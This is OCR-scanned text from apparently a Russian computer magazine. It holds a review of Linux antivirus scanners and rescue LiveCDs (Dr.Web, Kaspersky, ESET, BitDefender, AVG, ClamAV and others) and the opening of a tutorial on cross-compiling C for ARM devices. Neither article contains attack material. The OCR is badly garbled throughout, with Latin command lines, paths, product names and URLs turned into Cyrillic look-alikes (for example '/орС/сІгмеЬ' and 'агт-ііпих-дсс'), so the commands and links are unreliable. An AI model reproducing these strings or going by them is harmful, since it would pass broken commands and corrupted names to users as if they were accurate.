Ыпих на десктопах не превысила 1 -2%, и произво- 
дители популярных дистрибутивов своевременно 
выпускают зесигііу-ап дейты — бояться нечего. 

Но бывают ситуации, когда надо проверить винт 
с виндой на вирусы или флешку перед тем, как 
отдать кому-нибудь. В таких случаях и может 
пригодиться антивирь под Ыпих. 

Вообще, тестирование антивирей — дело неблаго- 
дарное, поскольку какого-то объеетивного теста не 
существует, и все очень сильно зависит оттестового 
набора вирусов (чем суспехом пользуются произ- 
водители, периодически вынося на суд обществен- 
ности тесты, неоспоримо доказывающие, что их 
антивирус «самый-самый»]. Так какво всех линуксо- 
вых анти вирусах базы и ядро идентичны виндовой 
версии, можно смело оценивать эффективность 
антивирусов под Ыпих потестам виндовых версий. 

ПЛАТНО 

За большинство подобныхантивирусов произво- 
дители просят деньги. Если антивирусделался с 
прицелом на корпоративных клиентов, он и стоить 
будет неплохих денег. Но если антивирь нужен 



«на пару раз», то можно обойтись и триальной 
лицензией (благо, большинство производителей 
ее предоставляют]. 

Обзор начну с Ог.ѴѴеЬдля Ыпих, таккакв апреле 
вышла «революционная» версия под номером 6 
с новыми интересными возможностями и гра- 
фическим интерфейсом. Имеется поддержка как 
32-, так и 64-битных дистрибутивов. Установка 
элементарна — с официального сайта скачивает- 
ся .гип-файлик, при запуске которого появляется 
графический установщик. После пары нажатий 
кнопки «Далее» продукт будет установлен. Если 
лицензионного ключа пока нет, то во время 
установки можно запросить с сервера компа- 
нии демо-ключ на 30 дней (демо-ключ можно 
запрашивать не чаще 1 раза в 4 месяца]. После 
установки в меню (Зпоте появится пункт«ОгѴѴеЬ» 
(сдвумя подпунктами: запускантивируса него 
удаление], а втрее появится симпатичная, но не 
о ч е н ь п одходя ща я п од дефолтную у бу нто в с кую 
тему иконка, символизирующая работу файлового 
монитора. 

С 61 -сканер тоже есть, для сканирования текущего 
каталога запускается так: 
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Интерфейс новой версии Рг.ѴѴеЬ для І_іпих 



$ /орС/сІгмеЬ/сІгмеЬ ./ 

Если ругнется на отсутствие файла с ключом, то запускать с 
указанием іпі-файла, например: 

$ /орС/сІгмеЬ/сІгмеЪ -іпі = /Ьюте/асІерк/ . ЫгууеЪ/ 
с!гѵуеЪ32 . іпі ./ 

Итого, за 799 рублей в год пользователь получит анти в и рус с 
графическим (6ТК) и СЫ интерфейсом, интеграцией с ОЕ, ан- 
тивирусным сканером и монитором, проверяющим файлы при 
обращении к ним. Учитывая общее с версией под винду ядро 
и базы — довольно выгодное предложение для тех, кому для 
спокойного сна нужен платный антивирус для Еіпих-десктопа. 

В отличие от Ог.ѴѴеЬ, в Лаборатории Касперского считают, что 
домашнему Еіпих-пользователю антивирус совсем не нужен. А 
вот в корпоративном сееторе может и пригодиться. Поэтому Ан- 
тивирус Касперского для ЫпихѴѴогкзІайоп нельзя купить отде- 
льно, только в составе Казрегзку ТЫюІБрасе Беси гку, Казрегзку 
Епіегргізе Брасе Бесигку, Казрегзку Визіпезз Брасе Бесигку 
или Казрегзку ѴѴогк Брасе Бесигііу (то есть от 7700 рублей в год]. 
Обновляется версия под Ыпих не очень активно — последний 
релиз (5.7.26) был аж в октябре 2008. На сайте доступны ОеЬ и 
грт, заявлена поддержка как32-, так и 64-бит. При установке 
сразутребует выдать ему файл слицензионным ключом (кото- 
рый можно запросить на офсайте для тестирования), предла- 
гает настроить прокси и скачать последние версии баз, а также 
можетустановить специальный модул ь для ѵѵеЬіт и скомпи- 
лировать модуль ядра каѵтопког (позволяет перехватывать 
вызовы ядра на обращения кфайлам и проверятьэти файлы на 
вирусы). Ксожалению, каѵтопкогне поддерживает ядра новее 
2.6.21 (для 32-битных систем) и 2.6.18 (для 64-битных), поэтому 
на всех более-менее новых дистрибутивах придется обойтись 
без него. Графического интерфейса у антивируса нет, только 
СЫ. Запускается следующим образом: 

$ зисіо /орк /казрегзку /каѵ4ѵуз /Ъіп/каѵ4ѵуз- 
каѵзсаппег /Стр 

Обновить базы можнотак: 

$ зисіо /орк /казрегзку /каѵ4ѵуз /Ъіп/каѵ4ѵуз- 
кеерир2сіаке 

Основные настройки антивируса хранятся в конфиге/еіс/орі/ 
ка з р е гз ку/ка ѵ4\л/з . со пЕ 

Еще один популярный у нас на родине производитель антиви- 
русов — Е5ЕТ — тоже имеетверсию для ипих-десктопов (ЕБЕТ 




АѴ6 ЫѵеСР стекстовым интерфейсом 



N0032 АпЬѵігиз4і : ог Ыпих Оезкіор], которая, правда, пока 
носит статус бета-версии. Зато бета-версию можно абсолютно 
бесплатно использовать до определенной даты. После выхода 
релиза, скорее всего, бесплатно можно будет использовать 
только триальную версию. Поддерживаются архитектуры х86 и 
х86-64, установка происходите помощью графического инстал- 
лятора. Поумолчанию антивирус ставится в/орі/езеЕ После 
установки нас приветствуетлаконичный интерфейс на (ЗТКи 
иконка в системном трее, символизирующая работу файлового 
монитора. Интерфейс можно переключить в «режим экспер- 
та», в котором добавится пара пунктов: Беіир (для настройки 
сканера и монитора] и Тооіз (для просмотра логов и файлов, 
находящихся на карантине]. Естьтакже СП-сканер, сканирова- 
ние те куще го катал о га : 

$ /орк/езек/езекз/зЪіп/езекз_зсап ./ 

Опция '-б' покажет возможные опции сканирования. Еще один 
достаточно крупный производительантивирусных решений, 
имеющий ипих-версии своихантивирусов — МсАІее. Вообще, 
если оценивать только их Ып их- продукты, то вендор довольно 
странный (кслову, единственный, у кого веб-сайт крутится на 
N5 — ничего личного, просто статистика :)). Вместо АІІ-іп-опе 
решения в их продуктовой линейке есть несколько отдельных 
решений для ипих: ЫпихБЫеШ (монитор, проверяющий 
файлы при обращении] и ѴігизБсап СоттапсІ ипеБсаппегІог 
Ппих. ЫпихБЫеШ стоит приблизительно в 2 раза дороже. Зато 
СоттапсІ ипеБсаппегесть нетолько под Ппих (х86 и х86-64], 
но и практически под все мыслимые ОС: ѴѴіпсІоѵѵз, ЕгееВБО, 
Боіагіз, НР-ІІХи АІХ. МсАІее позиционируетсвои продукты как 
решениятолькодля крупных компаний, поэтомуу партнеров 
можно купить не меньше 1 1 лицензий каждого наименования 
продукта, а прежде чем скачать пробную версию, надо запол- 
нить самую большую регистрационную анкету, в которой под- 
робно рассказать про свою компанию. СоттапсІ Ыпе Бсаппег 
устанавливается скриптом іпзіаіі-иѵзсап из скачанного архива. 
При установке скриптзадаст пару вопросов (куда установить 
и сделать ли симлинки] и предложит сразу проверить всю 
ФС. Сканер не рассчитан на работус новыми дистрибутива- 
ми, поэтомубез плясоксбубном на ІІЬипІи 10.04незавелся, 
ругнулся на отсутствие ІіЬзісІсч— н.зо.5. Пришлось ставить из 
дебиана ( ЬНр://раскаде5.беЬіап.огд/зі:аЬІ.е/Ьа5е/І-іЬ5і:сІс++5 І. Это 
единственный антивирусный сканер, не имеющий какой-либо 
утилиты для обновления. Новые базы предлагается скачивать 
самостоятельно и складывать в инсталляционную директорию. 
Для сканированиятекущей директории набираем: 






| НТТР://ѴѴѴѴѴѴ| 

1Г 



> Ііпкз 

• згосІисІз.сІгѵѵеЬ. 
сот/ііпих — Ог.ѴѴеЬ 
для Ыпих 

• ѵѵѵѵѵѵЗгеесІгѵѵеЬ. 
сот/ііѵессі — Ог.ѴѴеЬ 
ЫѵеСО 

• ѵѵ ѵѵѵѵ. казрегзку. 
ги/апЕ-ѵігиз Іі- 
пих ѵѵогкзіа- 
Еоп — Антивирус 
Касперского для 
Ыпих ѴѴогкзІаЕоп 

• ЬеІа.езеЕсот/Ііпих 

— ЫОР32 для Ыпих- 
десктопов 

• ѵѵѵѵѵѵ.ЬДсІеІепсІег. 
сот/ѵѵогІсІ/Ьизіпезз/ 
апЬѵігиз-Фг-ипісез. 
Ыт — ВіЮеІепсІег 
для Ыпих 

• т.аѵд.сот/дЬ-еп/ 
сі оѵѵп ІоасІ.ргсІ-абІ — 
АѴ6 Егее ЕсІіЕоп Гэг 
Ыпих 

• ѵѵѵѵѵѵ.аѵазГсот/ 
Ііпих-Ьоте-есІіЬоп 

— аѵазі: ! Ыпих Ноте 
ЕсІіЕоп 

• ѵѵѵѵѵѵ.сіатаѵ.пеі: — 
СІатАѴ 

• сосіе.доодіе.сот/р/ 
ѵіаѵге/ — ѴіАѵНе 




> ІПІО 



Подробнее про СІа- 
тАѴ читай в Хакере 
за июль 2008 (статья 
«Побеждаем вирусы 
в никсах»]. 
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ІШІХОЮ 



йАШОГЗ 



ОагикоЕЗ (от □аІеігидгіЯзкопІгоІІе, с немецкого — контроль за до- 
ступом к файлам] — специальная ФС, предоставляющая приложе- 
ниям механизмы для контроля доступа к файлам. Так как ОагикоЕЗ 
не входит в ванильное ядро, для того, чтобы ею воспользоваться, 
придется пропатчить и пересобрать ядро. ОагикоЕЗ используется 
многими антивирусами для реализации функции монитора. 
Первые две версии Оагико были разработаны и выпущены под 
лицензией 6РІ_ компанией Аѵіга От ЬН. Третья версия, получив- 
шая название ОагикоЕЗ, была полностью переписана уже силами 
сообщества. 



$ иѵзап . / 

Команда «тапиѵ5сап»поведаето большом количестве возможных опций 
разной степени полезности. ЫпихЗЫеИ официально поддерживаеттолько 
ННЕІ_ и 5І-Е0, для других дистрибутивов (и, соответственно, других ядер) необ- 
ходимо пересобирать ядро с модулями антивируса. Сомнительное удовольст- 
вие — пересобирать ядро при каждом апдейте из-за однихтолько антивирус- 
ных модулей. Ктомуже не факт, что модули соберутся с ядрами новее 2.6. 18. 

ХАЛЯВА 

Некоторые производители для привлечения внимания ксвоей продукции 
выдают бесплатные ключи для домашнего использования (втом чис- 
ле и Ыпих-версий]. Так поступает, например, ВШеІепбег. Ее продуктом 
ВіЮеіюпбегАпбѵігизЗсаппегіюгІІпісез можно пользоваться совершенно 
бесплатно в личных целях. Послезаполнения небольшой регистрационной 
анкеты на офсайте, на почту придет письмо с ключом на годи напомина- 
нием отом, что ключ^огрегзопаіизадеопіу». Еще один плюс в копилку 
ВіЮеіюпсІег— количество версий: для скачивания доступны беб- и грт- 
пакеты, ірк (универсальный инсталлятор) и Ф 2 для ЕгееВЗО. И все это какдля 
32-,такидля 64-битных ОС. Также внушаетуважениемануал на 128 страниц. 

В составе антивируса только сканер, монитора нет. Сканер можно за пустить 
какчерезСІЛ (есть интеграция с ОЕ], таки через СЫ. Сканирование текущего 
каталога: 

$ Ьсізсап . / 

Обновление баз: 

$ зисіо Ьсізсап --ирЬаСе 

Какобычно,«тап Ьсізсап» покажет много интересных опций. 

Еще один бесплатный для персонального использования антивирус — АѴО. 
Есть версии подЫпихМеЬ, грт.зЬ и простоархивсбинарниками. Правда, 
только 32-битные] и ЕгееВЗО (тожетолькодлях86). Для винды доступна 9-я 
версия, адля никсов — покатолько8.5 (выпущена вянваре 2010), но бета- 
версию грядущей девятки можно скачать после регистрации. Кроме сканера 
есть монитор для сканирования на лету. Только включениеданной функции 
нетривиально: нужны специальные модули для ядра (ВебігЕВили Оагико]. 
Графического интерфейса у антивируса нет, только СЫ. Сканирование 
текущей директории: 




ВКЕІфТйміѵ іМІчКгаЪмтм- Лм-ІІпкм - - 



^ ^ «У) 

БСйЛГМГ ирІІІЬІЁ 



« . Ь 1 |^І|І | Р і > ! «і ІІ іРі 
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Неплохой антивирус совершенно бесплатно 




Еще один бесплатный антивирь. Жаль, только для 
32-бит. 



регистрационный ключ или предложит пройти по ссылке и получитьего на сай- 
те (однако не ведись: хитрый анти в и рус отправляет по неправильной ссылке; 
правильный линк: ѵѵѵѵѵѵ.аѵазТсот/гедізІгаЬоп-Фее-апбѵігиз.рЬр ). КромеСІЛ, 
естьтакжеСЫ-интерфейс. Сканированиетекущего каталога: 

$ аѵазС . / 

Обновление баз: 

$ зисіо аѵазС-ирсіаЦе 

Следующий вендор, предлагающий бесплатное домашнее использование 
своего продукта — Е-РПОТ. Версия для Ыпих: Е-РРОТ Апбѵігиз Гэг Ыпих 
ѴѴогкзІабопз. Есть версии для ипих(і386,х86-64и РоѵѵегРС], ЕгееВЗИ, 
5оІагіз(для5РАВС и ІпЕеІ) и дажеАІХ. Последняя версия для Ыпих (6.0.3) 
вышла в декабре 2009 года. Установка осуществляется с помощью скрипта 
іпзіаІІ-ЬргоГрІ. Скриптпросто создает си мл инки в /изг/ІосаІ/Ьіп (или любой 
другой указанной директории на скачанные бинарники, поэтому лучше 
не уста на вливать Е-РгоС скажем, с рабочего стола, а предварительно 
переместить его куда-нибудь, например, в/орі). Последняя стадия установки 
— скачивание обновлений и постановка заданий на ежечасное скачивание 
обновлений в крон. Запуск: 



$ аѵдзсап . / 

Обновление баз: 

$ зисіо аѵдирсіаСе 

Очередной претендент— аѵазЕ Можно получить бесплатную годовую лицен- 
зию на персональное использование после регистрации. ЕстьбеЬ, грт и архив 
сбинарниками. Правда, опятьтолькодля 32-бит. Также отсутствует интеграция 
с ОЕ. Запускается антивирус командой аѵазідиі. При первом запуске спросит 



$ Нрзсап / 

Параметрами можно задать много вещей: например, глубину рекурсии (по 
умолчанию 30), уровни сканирования и уровень работы эвристика и т.д. 
(подробнее читай «тап Ірзап»), Принудительное обновление баз можно 
запустить командой Ірирбаіе (лежит в инсталляционной директории]. 

СВОБОДА 

Самый известный (и по совместительству — единственный нормальный] 
ОрепЗоигсе антивирус — сіатаѵ. Есть консольный сканер и несколько СІІІ к 
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Поостенький 


интеобейс Бг.ѴѴеЬ ЫѵеСБ 
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Бета-версия ІМОБ32 




Издалека можно спутать с КАѴ2010 




Куча антивирусов на одном ЫѵеСР 



немуісІатІкдлябТКи кіатаѵдля ксіе). Может работать также 
в качестве монитора через ОагикоРЗ. Правда, в большинстве 
тестов показывает не самые блестящие результаты. Зато есть в 
репозитории любого дистрибутива, для любой архитектуры, и 
нетникакихлицензионныхограничений. Самоетодля нетре- 
бовательных пользователей! 

ЖИВОЙ АНТИВИРУС 

ЫѵеСО с антивирусом не раз выручал меня в ситуации, 
когда нужно было быстро восстановить хоть какую-нибудь 
работоспособность винды, которая под грузом своих виру- 
сов ни в какую не хотела загружаться. Ксожалению, выбор 
среди подобных инструментов не очень велик — далеко 
не каждый вендор предлагаетсвой ЫѵеСО, да еще и на 
халяву. Пожалуй, самый известный представитель — 0 г. ѴѴеЬ 
ЫѵеСО. Текущая версия (5.02) вышла довольно давно, и пока 
никаких публичных бета-версий нет (хотя сборка с обнов- 
ленными базами выходит каждые сутки]. Но есть надежда, 
что после выхода версии 6 под Ыпих ЫѵеСО наконецобновят. 
Несмотря на то, что сборка основана на не совсем старых ком- 
понентах (ядро, например, версии 2.6.30], ветка про ЫѵеСО 
на официальном форуме бгѵѵеЬ полна сообщениями отом, 
что ОС в графическом режиме не грузится на том или ином 
железе. На такой случай есть ЗаіюМосІе с голой консолькой и 
консольным сканером. 



В отличие от Ог.ѴѴеЬ, Касперский свой ЫѵеСО особо не афиши- 
рует, на офсайтео нем нет даже упоминания. Но от гугла ничего 
не скроешь! :) ЫѵеСО можно свободно скачать отсюда: бЫрУ/ 
беѵЬиіЫз.казрегзкѵ-ІаЬз.сот/беѵЬиіІсІз/ВезсиеРізкІО . Грузит- 
ся ЫѵеСО довольно шустро. Только успеешь заметить, что он 
построен на базе Сепіюо и ядре 2.6.31 , каквыскочитлицен- 
зионное соглашение. После принятия условий использования 
запускается СІЛ (внешне похожий на каѵ 20 1 0] с возможностью 
сканирования и обновления баз. 

УАѴ6 тоже есть свой ЫѵеСО. При запуске встречаетлицензион- 
ным соглашением, которое, конечноже, внимательно прочитав, 
надо принять (иначе — ребут). Единственный ЫѵеСР, имеющий 
псевдографический интерфейс. При загрузке автоматически 
монтирует виндовые разделы, при этом разделы с ФС, отличной 
отРАТ или ІЧТР5, монтировать отказывается. Но из псевдогра- 
фического интерфейса можно выйти (а при необходимости 
командой агізапустить опять], смонтировать руками и запустить 
проверку из консоли. Из полезностей можно еще отметитьтулзу 
для редактирования реестра (ѴѴіпсІоѵѵз Редіз1:гу Есіііюг]. 

Бывают случаи, когда результатов проверки одним антиви- 
русом недостаточно. Видимо, так думали создатели дист- 
рибутива ѴіАѵРе (ѴіНиаІ Апбѵігиз РесЬескег], содержащего 
целый ворох различных антивирусов: Аѵд.Аѵазр ОоЫог 
ѴѴеЬ (СигеК], МсАіюе, ВіШеіюпсІег, Р-РгоР Проектеще очень 
молодой, но уже подает большие надежды. Последняя на 
момент написания статьи версия (04.10, вышедшая вап- 
реле этого года] создана на базе ОрепЗизе 11.2с помощью 
ЗиЗеЗЫсІіо. Еще одна фишка дистрибутива — команда 
ѵіаѵге-ирбаіе, позволяющая обновить базы сразу для всех 
установленныхантивирусов. Выпускается ЫѵеСО вдвух 
редакциях: ЫН версия с КОЕ (и минимальными требова- 
ниями в 768 Мб ОЗУ] и ІідЫ: версия с БХОЕ (поставляется без 
антивируса тсаіее, аѵд, ОгеЫх, ѵіНиаІЬох и кЗЬ; способна 
работать на 256 Мб ОЗУ]. 

ЗАКЛЮЧЕНИЕ 

Ксожалению, рассмотреть удалось далеко не все антиви- 
русы для Ыпих, а только наиболее известные. За бортом 
остались, например, Рапба БезкЫрЗесиге Ыг Ыпих и 
антивирус отАѵіга. Ноя надеюсь, что и среди представлен- 
ных вариантовты при необходимости сможешь найти себе 
что-нибудь по душе. ц-ц 




> ѵѵагпіпд 

Помни, что лечение 
винды с ЫѵеСО не 
всегда безопасно. 

На форумах полно 
тем про то, что после 
такого лечения винда 
не загружалась. 




> сіѵсі 

На прилагаемом 
кжурналу диске ты 
найдешь все описан- 
ные в статье ЫѵеСО. 
Надеюсь, они тебе 
не пригодятся :). 
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Мучаю ГпепсИѵАгт с китайским Ап сі го ісі 



Умелые ручки: 
кодинг и шитье 

Учимся работать с не-х86 архитектурами 
из-под Ііпих 



Гаджеты стремительно врываются в нашу жизнь. Большинство имеют 
на борту контроллер отличной от ІпІеГовской архитектуры х86. И если 
раньше программировать такие устройства могли только настоящие 
гуру , то теперь планка квалификации снизилась, а возможности самих 
контроллеров многократноувеличились. Докажем, что разработка 
етбебсіеб (то есть встроенного) софта из-под 6І\ІІІ/І_іпих нетолько 
возможна, но даже более удобна, чем из-под ѴѴіпсІоѵѵз. 



Зоопаркархитектур и устройств на них огро- 
мен, и поначалу во всем этом многообразии 
очень легко запутаться. Чтобы не охватывать 
все одновременно, можно пойти по пути 



наименьшего сопротивления: начать изучать 
что-либо одно. Предположим, утебя на руках 
есть устройство, бывшее в прошлой жизни ка- 
ким-нибудь маршрутизатором или контролле- 



ром сбора данных. Тогда можно поставить себе 
задачу научиться программировать это самое 
устройство: компилировать под него софт и 
прошивать. Если с ним натренироваться, 
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ха к всех остальных девайсов пойдет по накатанной, ибо 
на определенном уровне абстракции все становится оди- 
наковым. Система ѲІ\ИІ/1_іпих обычно сама умеет отделять 
модули для разных архитектур, и часто портирование про- 
граммы с одного устройства на другое сводится кзамене 
одной строчки в Маке-файле. 

Теперь отом, что нужно знать, прежде чем бросаться за 
программирование и прошивкутого или иного девайса. 
Само собой, нужен некий опыт написания и компилирова- 
ния хоть каких-нибудь программ на Си. Было бы нелишним 
уметь писать Маке-файлы и знать, какие куски библиотек 
прилинковываются к исполняемым файлам в ІІпіх-систе- 
мах. Также приветствуется моральная готовность после 
очередной перепрошивки устройства получить голый кусок 
железа вместо дышащего жизнью Ыпих-Ьох'а. 

Кроме добавления софта в уже работающий на девайсе 
І_іпих, не менее интересно работать также с «голым» конт- 
роллером (так называемый баге теіаі], когда во внутрен- 
ней памяти устройства нет ничего, кроме загрузчика. Такой 
вариант развития событий мы также рассмотрим. 

КОНКУРЕНЦИЯ 

В наше время, когда программисты железа уже не кодят 
на машинном уровне и не пользуются примитивными 
программаторами, а возможности самих микроконтролле- 
ров резко скакнули вверх, наше светлое дело строителей 
коммунизма помогает нам бороться за свободу на фронте 
етбеббеб-софта! Ура, товарищи! 

Если серьезно, то современные производители стали 
поставлять со своей продукцией какой-то невнятный вин- 
дово-кнопочно-тыкательный софт, позволяющий индусам 
от программизма неубирать руку с мышки. Казалось бы, 
рай настал, удобно? Но, как это ни странно, программиро- 
вание контроллеров из-под линукса оказывается в разы 
удобнее! Толи сказывается хакерское прошлое этой ОС, 
то ли ее кроссплатформенность, но факт — работать здесь 
комфортнее. На черном экране консоли работа замеча- 
тельно автоматизируется и освобождает программиста от 
поиска «той самой кнопки» в очередном 0111-интерфейсе 
для очередного МК. 

Иногда дела с подобным софтом нетакхороши, но 
знающие люди запускаютего через ѴѴіпе, или же просто 
реверсятего (пример: реверс ІІ5В-программатора для 
ЭіІаЬз С8051 : Ы:Ір://ес2сІгѵ.5оигсеі : огде.пеЧ . Одним словом, 
несмотря на некоторую ориентированность производите- 
лей на ѴѴіпбоѵѵз-пользователей, жить ивОІМІІ-мире можно. 



Итак, какой же софт должен иметь под рукой начинающий 
етЬесИесІ -программ ист? 

РЕДАКТОРЫ И СРЕДЫ 

Как и в программировании для «большого брата», самое 
главное — это удобство рабочего места. Чтобы файлики в 
проекте были отсортированы, а компилятор вызывался с 
нужными параметрами, существуют среды программиро- 
вания (или ЮЕ — Іпіедгаіесі Безкіюр Епѵігоптепі]. В общем 
смысле, нам подойдетлюбая среда программирования, уме- 
ющая базово понимать хотя бы языкСи и вызывать внешний 
компилятор. Но некоторые из них я подчеркну особо. 
СосІе::ВІоск5 ( ѵѵѵѵѵѵ.собеЫоскз.ога І. Это оченьудобная и 
простая среда, не перегруженная наворотами. Автомати- 
чески подцепляет все найденные компиляторы и отлад- 
чики, подсвечивает синтаксис и функции, поддерживает 
внешние таке-файлы и импортирование проектов из 
других ЮЕ. В этой среде удобно программировать подо что 
угодно, втом числе и под микроконтроллеры, чем я в ней и 
занимался последние пару лет. Несмотря на то, что послед- 
нее обновление программы на сайте значится от февраля 
2008 года, она все же развивается, и регулярные билды 
выкладываются взѵп. 

Есіірзе ( уууууу.есОрзе.огд ). Монстр, написанный на Чаѵа, ко- 
торый поддерживает все на свете, а что не поддерживает — 
легко дополняет плагинами. Если ты уже программируешь 
на этой платформе, то переучиваться необязательно — 
контроллеры кодятся и тут. Ѵіт/Етасз. Любители консоли с 
полпинка прикрутят ксвоемулюбимому редактору нужные 
скрипты для компиляции и прошивки. Блокнот. Такуж по- 
велось, что в какой-то момент программисты забивают на 
использованиетой или иной среды разработки и начинают 
писать в обычном текстовом редакторе. Гномосеки отдадут 
предпочтение десЮ, кедерасты — каіе. Оба редактора 
подсвечиваютсинтаксис и немного поддерживаютавто- 
дополнение. Если ты не боишься компилирования в голой 
консоли, то возможностей блокнотика тебе хватит. 

КОМПИЛЯТОРЫ 

Пройдемся по софту, переводящему человеческий языкСи в 
машинные коды. Ведь нет компилятора — нети программы. 
01\Ю ОСС. На первом месте, конечно, компилятор ОСС, 
который используется везде в Бтих-мире. Под какую архи- 
тектуру он бы ни собирал код, можно быть уверенным, что 
синтаксис будет совместимым, код — переносимым, а коро- 
вы — надоены. Я настоятельно рекомендую использовать в 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

ЬирУ/ѵѵікі.зіагІегкіЕ 
ги/сгозз сотрііег 
— русскоязычный 
мануал по сгоззіюоі- 
пд. 

ЬЛрУ/ѵѵікі.ореп- 
етбеббеб.пеі — 

хороший проект для 
сборки корневой ФС 
под встраиваемый 
линукс. 




> іпіо 

ЛА6 — стандарт 
для внутрисхемного 
программирования 
и отладки всяческой 
электроники. Если 
девайс не самый 
примитивный, то этот 
интерфейс на нем 
наверняка разведен. 
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Большинство существующих на рынке отладочных платуже имеют 
на борту загрузчиктой или иной степени куцеватости. Пример 
— знаменитый Э-ЬооЕ Так вот, подобные программы позволяют 
прошиватьустройство без всяких программаторов через Э5В или 
последовательный порт (Хтобет]. У ниххватаетума положить 
прошивку по определенному адресу во флеш, а также скопировать 
в память и передать ей управление. Довольно часто подобные 
загрузчики живут на отдельной микросхеме памяти, до которой не 
добраться, кроме как через ЛАО. Получается некая защита от ду- 
рака: если у человека хватило квалификации убить такое, то хватит 
и восстановить. 




і — 



работе именно его, даже несмотря на то, что некоторые коммерческие и 
сторонние компилеры могут быть эффективнее. ЭйСС или ЭтаІІ Беѵісез 
С Сотрііег. Создан для сборки прошивок под простые процессоры типа 
Іпіеі МС351 , АѴК, НС08, РІС и 280. В параллельном мире конкуренцию 
ему можетсоставитьтулчейн для 8051 от Кеіі. 

Проприетарные компиляторы. Тот же Кеіі, например. Многие умельцы 
используют его через ѴѴіпе и не жалуются. Что ж, тоже вариант. 

Прочие. Понятно, что выбор вышеперечисленными софтинами не 
ограничивается. Поиск по Сети покажет множество компилеров под 
малоизвестные или забытые архитектуры, и использовать их — дело 
вкуса или необходимости. 

компиляция 

Компилятору насесть, теперьнадо им что-нибудь собрать, например, 
под АРМ -архитектуру. ССС предлагает для таких целей два «таргета»: 
агт-ііпих и агт-дсс. Если вкратце, то отличаются они друг от друга тем, 
что первый нужен для сборки софта под Ыпих, а второй — под голое 
железо. Это не совсем корректное объяснение, но для первого раза 
вполне подойдет. 

Для начала разберемся втом случае, если устройство, под котороеты 
кодишь, уже имеетсвой Ыпих на борту, итебе надо лишь написать под 
него свою софтину. 

Как известно, все Юниксы очень дружелюбны, просто слишком разбор- 
чивы в друзьях. Я ктому, что при наличии Ыпих на основной машине 
написание софта становится сущим кайфом. Если твоя программа не 
использует сторонних библиотек, то компиляция сводится кпростому 
переопределению компилера. Напишем программку: 

$ѵі Неііо.с 

#іпсіисіе <зкс1іо.Ъ.> 
іпС таіп ( ) { 

ргіпкі ( "Неііо ѵгогісП \п" ) ; 

} 

Теперь скомпилируем: 

$ агт-ііпих-дсс -о Ііеііо кеііо.с 
$ Тііе Ьеііо 

Ііеііо: ЕЬР 32-ЪіС ЬЗВ ехесиСаЫе, АРМ, ѵегзіоп 1, 
зСаСісаІІу ІіпкесЦ пок зкгірресі 

Как видим, получившийся бинарник имеет нужную целевую архитекту- 
ру и если его тем или иным способом залить на устройство, то он даже 
запустится, выдав сообщение в консоли. 

Если проект имеет Маке-фа йл, то компилятор можно переназначить до 
вызова программы таке. Воттак: 

$ СС=агш-1іпих-дсс таке 

Аесли наличествует скрипт сопТідиге, то, например, так: 




Горка программаторов 



$ СС=агт-1іпих-дпи-сс . /сопіідиге --1юзк=агт 

Ачто же с более сложными проектами, использующими сторонние 
библиотеки? Ведь если они присутствуют на РС’шнике и собраны под 
РС-архитектуру, то кросс-компилятор откажется их использовать! Мало 
того, он даже не найдет эти файлы. Можно вспомнить, кактакие про- 
блемы решаются на Большом Брате. Если там не хватает какой-нибудь 
либы, то команда типа «а рі-деі іпзіаіі ІіЬпсигзезб-сІеѵ» обычно решает 
проблему поиска заголовков ибинарниковдля библиотеки. Так вот, в 
случае с другими архитектурами можно сделать точнотакже, а именно 
— поискать уже готовые и заранее скомпилированные либы. Проект 
Бебіап, скорее всего, имеет на своихзеркалах все более-менее попу- 
лярное. Хотя, если для тебя использование готовенького — читерство, 
то логично, что все нужные библиотеки тоже надо компилировать 
самому. 

Разумеется, версии и реализации качаемых б и бл и отек должны быть 
одинаковы стеми, что на устройстве, или хотя бы не сильно отличать- 
ся друг от друга. Например, многие е т ЬесІ б еб -линуксы имеют у себя 
на борту крошечную библиотеку исіібс вместо «взрослой» и большой 
діібс. Они не особо совместимы между собой, поэтому софт должен 
собираться в паре стой либой, что установлена на девайсе. То есть, это 
тянет за собой весь тот самый Берепсіепсу Неіі, та к знакомый олдовым 
линуксоидам, да еще усугубленный необходимостью иметь «по второму 
экземпляру» всего кроссплатформенного на хост-машине. 

В общем, если ты собираешься компилировать что-то сложнее кон- 
сольной программки, советую первое время не выпендриваться и 
искать уже прекомпилированное окружение, так можно сэкономить кучу 
нервов. 

Ачто, если у тебя на руках голая железка, и никакого Линукса ты на 
нее ставить не собираешься? Тут становится одновременно и легче, и 
сложнее. В таком случае для создания прошивки следует порядочно 
попотеть, читая документацию на процессор, писать свой загрузчик 
и инициализацию периферии, но зато пропадает ненавидимый нами 
ад зависимостей, ибо все, написанное в исходнике, будет в итоговом 
бинарнике — не больше. В любом случае, обучение программированию 
контроллеров на низком уровне выходит за рамки этой статьи, но в 
целом команды компиляции могут выглядеть, например, так: 

$ 1 3 

зкагкир.З таіп. с зсігат.ісіз 
$ агт-еіі-дсс -Оз -тагс]і=агтѵ4к -с \ 

-о зкагкир.о зкагкир.З 

$ агт-еіі-дсс -Оз -тагс]г=агтѵ4Ц -с -о таіп. о таіп. с 
$ агт-еіі-дсс -Т" зсігат. ісіз " -з -Оз -тагсЪ=агтѵ4Р \ 
-позкагРіііез -позксІІіЪ -о іігтаге . еіі зкагкир . о таіп . о 
$ агт-еіі-окд сору --зРгір-сІеЬид --зргір-иппеесіесі \ 
іігпмаге . еіі -О Ьіпагу іігпшаге . Ъіп 
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Энтузиасты -китай цы создали крайне дешевое Ыпих-устройство 
с кѵчей возможностей — ЕгіепсІІѵАКМ [Ьирі/АгіепсІІѵагпп.пеі]. Его 
разновидность, МІПІ2440, создан на базе контроллера Эатзипд 
зЗс2440 и имеет сенсорный ЮО-экран. Купить та кое для экспери- 
ментов несложно, а продается он за 1 50 баксов. 




1 



Объясню, что здесь написано, чтобы было нетакстрашно. Здесь 
происходитсборка некой прошивки из двух исходных файлов, один 
из которых написан на ассемблере, а другой — на Си. Параметр "-Оз" 
указывает на необходимость оптимизировать размер бинарника, а 
"-тагсЬ=агтѵ4Г — на оптимизацию под конкретное процессорное 
ядро АЕМѵ4. Далее, получившиеся объектные файлы мы связываем в 
общийбинарник, настоятельно рекомендуя линкеру не использовать 
его собственные загрузочные файлы и стандартную библиотеку. Они 
нам не нужны. Теперь про опцию "-ТзсІгатТсІз". Файлы типа Ісіз — это 
такназываемыелинкерные скрипты. Дело втом, что компилятор, со- 
бирая проект, должен знать структуру памяти, в которой будет работать 
прошивка. Даже для программ, собираемых под родной Линукс на 
х86-архитектуре, дсс достает откуда-то из недр своих каталогов нужный 
